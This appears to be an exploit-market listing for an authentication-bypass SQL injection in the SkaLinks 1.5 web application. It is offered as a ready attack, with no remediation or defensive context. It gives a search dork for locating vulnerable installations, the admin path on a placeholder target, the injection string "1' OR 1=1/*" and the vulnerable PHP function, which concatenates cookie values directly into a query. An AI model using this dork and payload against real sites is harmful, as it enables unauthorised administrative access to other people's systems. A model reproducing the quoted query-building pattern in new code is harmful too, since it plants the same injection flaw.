[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability

Author
Dimi4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4764
Category
web applications
Date add
30-01-2009
Platform
unsorted
======================================================
SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability
======================================================


########################################
#                                      #
# Product : SkaLinks                   #
# Version : 1.5                        #
# Dork : Powered by SkaLinks           #
# Site: http://www.skalinks.com/       #
# Founded by: Dimi4                    #
# Date : 29.01.09                      #
#                                      #
########################################

SQL-injection, Auth Bypass
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1' OR 1=1/*

Bug Function:

 function IsAdmin( )
    {
        $table_name = $this->m_AdminsTable;
        $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'");
        if ( !$res )
        {
            return 0;
        }
        else
        {
            return $res;
        }
    }



#  0day.today [2024-11-16]  #